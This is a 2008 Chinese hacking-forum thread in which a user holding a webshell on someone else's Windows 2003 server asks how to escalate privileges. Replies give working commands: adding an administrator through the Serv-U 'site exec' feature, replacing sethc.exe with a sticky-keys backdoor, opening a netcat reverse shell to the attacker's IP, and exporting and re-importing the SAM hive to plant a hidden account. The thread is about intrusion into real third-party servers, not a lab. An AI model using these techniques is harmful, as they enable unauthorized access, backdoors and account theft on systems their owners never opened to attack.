Board logo

标题: [讨论]提权 当net user不能添加用户时 我们该怎么办? [打印本页]

作者: s37su37    时间: 2008-7-22 09:45     标题: [讨论]提权 当net user不能添加用户时 我们该怎么办?

[讨论]提权 当net user不能添加用户时 我们该怎么办?
议题作者:sunue
信息来源:邪恶八进制信息安全团队(www.eviloctal.com

艰难得拿到了webshell。
想不到提权路上更是艰辛。
服务器是2003,3389开启。无pcanywhere.
仅C盘可见,但没有写权限,其他盘全部不能浏览。
传了一个cmd.exe到C:\Documents and Settings\All Users\Documents
再用WScript.Shell可以执行一些命令。net user 可以列出帐户。
但一用net user /add 添加帐户就无回显,命令也没有执行。
装有serv-u6.2,43598打开,默认管理员帐号密码没有改,于是开始ASP直接提权。但还是不能创建帐户。
aspx上传上去直接是错误,无法运行。
于是开始本地SERV-U提权。用FPIPE把43598端口转发到出来,然后本地连接上,可以看到许多ftp帐户,自己建个超级管理员帐户。成功登陆FTP。
执行命令:
quote site exec net user h4cker h4cker /add
quote site exec net localgroup administrators h4cker /add
回显200 EXEC command successful (TID=33).
执行是成功的。但帐户还是没有建上。
于是我传了个pcshare上去。服务器的杀毒软件是麦咖啡。没有杀,我也不知道我运行成功没有。反正没有上线。
到此,我已经是没有办法了。
我想问题可能是出在net user /add不能执行上面。
希望各位能给我指点一下。谢谢了。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

dingking
荣誉会员

作者: 发车狂    时间: 2008-7-22 09:45

呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~


quote site exec "net user h4cker !!!@@@QQQaaa /add"

你试下.....也许就加上咯....
引用:
但一用net user /add 添加帐户就无回显,命令也没有执行。
WEBSHELL上加用户肯定是没回显的,因为都加不上嘛~.... 直接用 net user 查看用户是可以回显的....
昨天是明天的前天今天是昨天的明天明天是昨天的后天    ╰o╯╰o╯
帖子741 精华2 积分4784 阅读权限100 性别男 在线时间756 小时 注册时间2005-6-17 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP 您知道您年薪应是多少?

゛小︷帅!﹊
晶莹剔透§烈日灼然
作者: 东莞大岭山    时间: 2008-7-22 09:46

复制内容到剪贴板
代码:
aspx上传上去直接是错误,无法运行。
上传不行,那你就新建一个aspx在根目录下吧。

然后看看这个aspx的权有多少大吧

帖子58 精华0 积分155 阅读权限40 来自杭州 在线时间152 小时 注册时间2007-9-29 最后登录2008-7-16 查看个人网站
查看详细资料引用 报告 回复 TOP 软件项目外包

fucking
晶莹剔透§烈日灼然
作者: ★德仔★    时间: 2008-7-22 09:46

如果涉及到MSSQL,MYSQL(不知道你是怎么拿到SHELL)。。。。俺看这是最好的提权选择,可以做太多事情了。。。


帖子28 精华0 积分103 阅读权限40 性别男 在线时间124 小时 注册时间2007-8-19 最后登录2008-6-6 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: 清新贵族    时间: 2008-7-22 09:46

引用:
引用第1楼dingking于2007-12-28 04:36发表的 :
呵呵...没加上用户的原因非常相当有可能是做了密码策略.....~


quote site exec "net user h4cker !!!@@@QQQaaa /add"

.......
谢谢提供方法哈。

230 User logged in, proceed.
ftp> quote site exec "net user h4cker !!!@@@QQQaaa /add"
200 EXEC command successful (TID=33).
ftp>

照你说的,,FTP提权又提示成功了
但到WEBSHELL里net user ,还是老样子,没有这个用户。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP 良辰择日,预测咨询,公司改名,权威易经

sunue
晶莹剔透§烈日灼然
作者: 东莞小子    时间: 2008-7-22 09:46

引用:
引用第2楼゛小︷帅!﹊于2007-12-28 19:07发表的 :
复制内容到剪贴板
代码:
aspx上传上去直接是错误,无法运行。
上传不行,那你就新建一个aspx在根目录下吧。

然后看看这个aspx的权有多少大吧
我通过SERVU本地连接他,找到了.net的目录,然后新建了个用户,把这个用户的目录设为这个.net目录,然后登FTP,传了个aspx的上去,权限很小,出现的情况跟asp一样。

看来管理员是个行家
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

sunue
晶莹剔透§烈日灼然
作者: 东莞军人    时间: 2008-7-22 09:46

引用:
引用第3楼fucking于2007-12-28 19:37发表的 :
如果涉及到MSSQL,MYSQL(不知道你是怎么拿到SHELL)。。。。俺看这是最好的提权选择,可以做太多事情了。。。


服务器上没有sqlserver和mysql。我本来是看上了他的一个WEB程序,想拿,结果没拿上,然后通过同一个服务器的另一个网站进去的。先扫后台,然后猜出了密码,后来那站居然有直接上传文件的模块,于是传马,结果ASP无论怎么传都传不上。于是抓包上传,三次失败后终于成功,,汗。现在回忆起来也还挺简单的。。。。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP 让女孩一夜变的更有女人味

hack520
运维管理组

作者: 枝囡    时间: 2008-7-22 09:46

先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:\windows\zhu.txt

如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.

既然是以系统权限启动,那可以肯定加不上用户应该是密码策略的原因,为了确认,你可上传一nc 反弹,用quote site exec 执行反弹命令得到CMDSHEL,然后再慢慢打命令.这样够明了了.Www.China-Mu.Co.Kr 猪毛奇迹 1.02Q 将带给你无比的震撼。
帖子1082 精华6 积分5597 阅读权限150 性别男 在线时间576 小时 注册时间2005-3-18 最后登录2008-7-2 查看个人网站
查看详细资料引用 报告 回复 TOP

knlve
晶莹剔透§烈日灼然
作者: 刘文钟    时间: 2008-7-22 09:46

quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\ServicePackFiles\i386\sethc.exe /y"

quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\system32\dllcache\sethc.exe /y"
quote site exec "copy C:\WINDOWS\explorer.exe c:\windows\system32\sethc.exe /y"‘.黒皕甡萿.…

帖子10 精华0 积分37 阅读权限40 性别男 在线时间15 小时 注册时间2007-5-5 最后登录2008-2-13 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: 标叔    时间: 2008-7-22 09:46

引用:
引用第7楼hack520于2007-12-29 09:05发表的 :
先确定一下serv-u是否以系统权限启动
quote site exec echo zhu>c:windowszhu.txt

如果文件存在,则是以系统权限启动.windows2003 默认情况下windows目录不会给你乱丢东西的.当然除了某些猪管理乱配权限.

.......
谢谢这位大哥的思路,但我未成功,估计是我笨吧。
先确定一下serv-u是否以系统权限启动
执行
ftp> quote site exec echo zhu>c:windowszhu.txt
501 Cannot EXEC command line (error=2).
返回这个。他应该在C盘做了权限的设置。或者就是那该死的麦咖啡。
然后我用NC反弹,我试了以下几串命令
C:\Inetpub\nc.exe -l -p 1001 -e C:\Inetpub\cmd.exe 构造telnet,没有任何反映
C:\Inetpub\nc.exe -e cmd.exe IP PORT 反弹cmdshell,没有任何反映
C:\Inetpub\nc.exe -vv -l -p 1001 监听端口,则1001端口终于开放。但是我不知道这个我该如何利用了?

哎,我太菜,希望指教。
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: ic369    时间: 2008-7-22 09:46

引用:
引用第8楼knlve于2007-12-29 10:45发表的 :
quote site exec "copy C:WINDOWSexplorer.exe C:WINDOWSServicePackFilesi386sethc.exe /y"

quote site exec "copy C:WINDOWSexplorer.exe C:WINDOWSsystem32dllcachesethc.exe /y"
quote site exec "copy C:WINDOWSexplorer.exe c:windowssystem32sethc.exe /y"
首先谢谢这位大哥。
SHIFT,我以前在webshell里试过没用。
经这位大哥提醒跑到ftp下用,结果还是不行。
详细的如下,看,若是我用ipconfig,则返回成功。
棘手,,,,,
331 User name okay, need password.
Password:
230 User logged in, proceed.
ftp> quote site exec "copy C:\WINDOWS\explorer.exe C:\WINDOWS\ServicePackFiles\i
386\sethc.exe /y"
501 Cannot EXEC command line (error=2).
ftp> quote site exec "ipconfig"
200 EXEC command successful (TID=33).
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

zhuziliu
晶莹剔透§烈日灼然
作者: 山冈分    时间: 2008-7-22 09:46

估计是咖啡的变态策略设置了。

有禁在C盘生成任何文件的,所以shift估计是没戏了,大马也不会有戏,想办法建用户吧。

PS:另外上传net.exe和net1.exe运行看。

帖子21 精华0 积分70 阅读权限40 在线时间207 小时 注册时间2005-7-3 最后登录2008-7-18 查看详细资料引用 报告 回复 TOP

28度的冰
荣誉会员

作者: 土人    时间: 2008-7-22 09:46

200 EXEC command successful (TID=33).仅代表命令已经被执行,置于执行结果如何Serv-u不会去管。
也就是说,如果Serv-u是以User权限运行的,即使命令执行了,也是User权限能做的。I love amethyst!

帖子177 精华0 积分3591 阅读权限100 性别男 来自浙江 在线时间215 小时 注册时间2007-1-18 最后登录2008-7-18 查看个人网站
查看详细资料引用 报告 回复 TOP

bluenight
晶莹剔透§烈日灼然
作者: 招鹏    时间: 2008-7-22 09:46

根据楼主的情况,像猪哥和28°冰说的一样

我认为你应该确定下ser u是否可以执行系统命令

比如你可以用seru echo新建个文件,查看存在不,或者webshell上传一个文件,然后再seru里面del

如果成功,证明你有系统权限,如果不成功那有可能seru的权限是普通用户的(如果这样,估计没办法了)

如果有系统权限,那可能是密码策略出了问题,你吧密码设置复杂一点,比如,QWERTY123465!@# 要不就是net出问题了,试一试net1.exe

如果还不可以,估计管理员吧net.exe和net1.exe都做了手脚,那就用原创里面有个"不用net.exe添加管理员"的一个小程序,很好用的
帖子30 精华0 积分93 阅读权限40 性别女 在线时间65 小时 注册时间2007-7-22 最后登录2008-5-15 查看个人网站
查看详细资料引用 报告 回复 TOP

xiaocool
晶莹剔透§烈日灼然
作者: 夕风    时间: 2008-7-22 09:46

不行就net1user吧
帖子162 精华2 积分431 阅读权限40 在线时间75 小时 注册时间2005-8-4 最后登录2008-6-9 查看详细资料引用 报告 回复 TOP

瘋吇ぺx
晶莹剔透§烈日灼然
作者: dgweimann    时间: 2008-7-22 09:46

晕  我遇的一个站和你的情况一模一样  不会是一个站点吧

如果这位大哥 拿下了 联系小弟一下 非常感谢
QQ:415961584123

帖子5 精华0 积分17 阅读权限40 性别男 在线时间36 小时 注册时间2007-3-19 最后登录2008-6-2 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: runmax    时间: 2008-7-22 09:46

回上面的各位朋友,
用服务器上的net1.exe我试过,跟net一样,没有用。
于是自己上传net1.exe,也没有任何作用。
建立复杂的密码帐号也试过了,不起作用。
sevu echo新的文件到/windows,不成功。
我觉得我要抓狂了
上面的兄弟,马上加你
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

瘋吇ぺx
晶莹剔透§烈日灼然
作者: 山^鹰    时间: 2008-7-22 09:46

我的情况跟你差不多 不过更可气的是

连接SU的时候 需要密码 我晕了

破解了一个连上去还没有足够的权限  

尽快加我!!123

帖子5 精华0 积分17 阅读权限40 性别男 在线时间36 小时 注册时间2007-3-19 最后登录2008-6-2 查看详细资料引用 报告 回复 TOP

bachelor
晶莹剔透§烈日灼然
作者: szxrszxr    时间: 2008-7-22 09:46

如果可能的话就直接跑SYS用户,不要加自己的用户了
我也遇到很多关于没有写权限的,不过很多都放弃了
我本身在提权方面很菜

帖子11 精华0 积分31 阅读权限40 来自china 在线时间5 小时 注册时间2007-11-6 最后登录2008-7-11 查看详细资料引用 报告 回复 TOP

jjzj8
晶莹剔透§烈日灼然
作者: QQ小敏    时间: 2008-7-22 09:46

有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户

测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器,去年烟花特别多

帖子15 精华0 积分42 阅读权限40 来自水晶黑客信息同盟 在线时间10 小时 注册时间2006-5-5 最后登录2008-3-10 查看个人网站
查看详细资料引用 报告 回复 TOP

bluenight
晶莹剔透§烈日灼然
作者: 冲红灯    时间: 2008-7-22 09:46

楼主的ser-u很显然不是系统权限了,估计不好办了

不过这位朋友说的,很想知道,能不能说一下具体的方法```

mt使用是系统权限,还是guest,user权限
引用:
引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户

测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器,
帖子30 精华0 积分93 阅读权限40 性别女 在线时间65 小时 注册时间2007-7-22 最后登录2008-5-15 查看个人网站
查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: 小希    时间: 2008-7-22 09:46

引用:
引用第19楼jjzj8于2007-12-31 02:05发表的 :
有些服务器,在无法用net.exe net1.exe 的时候
用MT提权配合导入注册表建用户

测试成功。
这是我拿重庆网安时第一次碰到上传net.exe。执行也不行的服务器,
我试过本地建个帐户,然后导出注册表(就类似于建立隐藏帐户那种)。
然后写了批处理,想在服务器上导入注册表。
但最终还是失败了。
这位大哥提到了MT,不知道你具体做法是怎样的?
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

zczpc2000
晶莹剔透§烈日灼然
作者: 老游子    时间: 2008-7-22 09:46

看了你这个,估计最大的可能就是SU是user启动的,那就基本木搞了,除非你有0DAY。

另外你的NC貌似也搞错了。

先在本地nc -vlp 1234(也可以是其它端口)

然后在FTP里执行quote site exec "c:\inetpub\nc.exe -e cmd.exe xxx.xxx.xxx.xxx(你的IP) 1234"

还有就是用注册表加用户:先quote site exec "regedit.exe /e 1.reg HKEY_LOCAL_MACHINE\SAM"

然后在本地regedit /s 1.reg ,在本地net user test 123456789=1234 /add

在regedit /e 1.reg 1.reg HKEY_LOCAL_MACHINE\SAM

最后在服务器上quote site exec "regedit /s 1.reg"
帖子31 精华0 积分96 阅读权限40 在线时间34 小时 注册时间2005-12-30 最后登录2008-6-28 查看详细资料引用 报告 回复 TOP

sunue
晶莹剔透§烈日灼然
作者: dabofeng    时间: 2008-7-22 09:46

引用:
引用第22楼zczpc2000于2007-12-31 20:40发表的 :
看了你这个,估计最大的可能就是SU是user启动的,那就基本木搞了,除非你有0DAY。

另外你的NC貌似也搞错了。

先在本地nc -vlp 1234(也可以是其它端口)
.......
谢谢指教。
貌似SU确实是USER,虽然我把帐户弄成管理员,但是nc反弹不起作用哈。
另外,到出SAM,FTP显示执行成功,但并没有产生1.reg。

so,,我准备放弃了,,,,,,
帖子12 精华0 积分44 阅读权限40 在线时间47 小时 注册时间2007-3-9 最后登录2008-6-14 查看详细资料引用 报告 回复 TOP

doublej
晶莹剔透§烈日灼然




欢迎光临 【3.A.S.T】网络安全爱好者 (http://3ast.com./) Powered by Discuz! 7.2